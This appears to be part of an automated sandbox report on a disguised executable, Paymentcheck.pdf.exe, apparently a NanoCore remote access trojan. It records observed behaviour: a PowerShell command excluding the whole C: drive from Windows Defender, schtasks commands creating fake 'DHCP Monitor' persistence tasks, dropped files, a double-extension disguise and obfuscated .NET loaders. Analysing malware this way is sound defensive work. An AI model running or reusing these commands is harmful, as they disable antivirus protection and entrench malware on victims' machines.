Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp'Jump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Paymentcheck.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Paymentcheck.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RegAsm.pdb source: RegAsm.exe, dhcpmon.exe, dhcpmon.exe, 00000019.00000000.859072816.0000000000DF2000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000D.00000000.820068225.00000000004A2000.00000002.00020000.sdmp, RegAsm.exe, 00000012.00000000.835793431.0000000000992000.00000002.00020000.sdmp, dhcpmon.exe, 00000016.00000002.844182498.0000000000E62000.00000002.00020000.sdmp, dhcpmon.exe, 00000019.00000000.859072816.0000000000DF2000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpackerShow sources
Source: Paymentcheck.pdf.exe, Hhqpifkcellhsdlnziy.Dictionaries/TokenInfoDic.cs.Net Code: InitDescriptor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: msbuildd.exe.0.dr, Hhqpifkcellhsdlnziy.Dictionaries/TokenInfoDic.cs.Net Code: InitDescriptor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Paymentcheck.pdf.exe.660000.0.unpack, Hhqpifkcellhsdlnziy.Dictionaries/TokenInfoDic.cs.Net Code: InitDescriptor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.Paymentcheck.pdf.exe.660000.0.unpack, Hhqpifkcellhsdlnziy.Dictionaries/TokenInfoDic.cs.Net Code: InitDescriptor System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Paymentcheck.pdf.exeStatic PE information: 0xBB2F66FF [Sun Jul 7 18:05:51 2069 UTC]
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_006646EC push ss; ret 0_2_006646F6
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_006646F8 push ss; ret 0_2_006646FC
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_0066457E push cs; ret 0_2_00664582
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_00664578 push cs; ret 0_2_0066457C
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_0066375A push ecx; retf 0_2_006637C8
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_006645A8 push 0000000Fh; ret 0_2_006645B2
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_0066458A push cs; ret 0_2_0066458E
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_00664590 push cs; ret 0_2_0066459A
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeCode function: 0_2_0793B197 push 5D64812Ch; ret 0_2_0793B169
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_004A4289 push es; retf 13_2_004A4294
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_004A4469 push cs; retf 13_2_004A449E
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_004A44A3 push es; retf 13_2_004A44A4
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_00ECC200 push ds; iretd 13_2_00ECC20E
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06192401 push esi; retf 0005h13_2_06192402
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06192459 push esi; retf 0005h13_2_0619245A
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_061922FF push ebp; retf 0005h13_2_06192302
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06192310 push esi; retf 0005h13_2_06192352
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06192039 push ebp; retf 0005h13_2_0619203A
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619305F pushad ; retf 0005h13_2_06193062
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_061920D8 push ebp; retf 0005h13_2_061920DA
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06192130 push ebp; retf 0005h13_2_06192132
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06192189 push ebp; retf 0005h13_2_0619218A
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_061921DF push ebp; retf 0005h13_2_0619226A
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_061921F0 push ebp; retf 0005h13_2_0619226A
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619AF76 push 8B000005h; retf 13_2_0619AF7F
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_06191DE0 push esp; retf 0005h13_2_06191DE2
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619FA78 push esp; retf 13_2_0619FA79
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619B82B push es; ret 13_2_0619B83C
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619182F push eax; retf 0005h13_2_06191832
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619197F push ecx; retf 0005h13_2_06191982
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 13_2_0619F9DA pushad ; iretd 13_2_0619F9E5
Source: initial sampleStatic PE information: section name: .text entropy: 7.98540121704
Source: initial sampleStatic PE information: section name: .text entropy: 7.98540121704
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to dropped file
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

Boot Survival:

barindex
Creates an undocumented autostart registry key Show sources
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsssJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exeJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe\:Zone.Identifier:$DATAJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Uses an obfuscated file name to hide its real file extension (double extension)Show sources
Source: Possible double extension: pdf.exeStatic PE information: Paymentcheck.pdf.exe
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
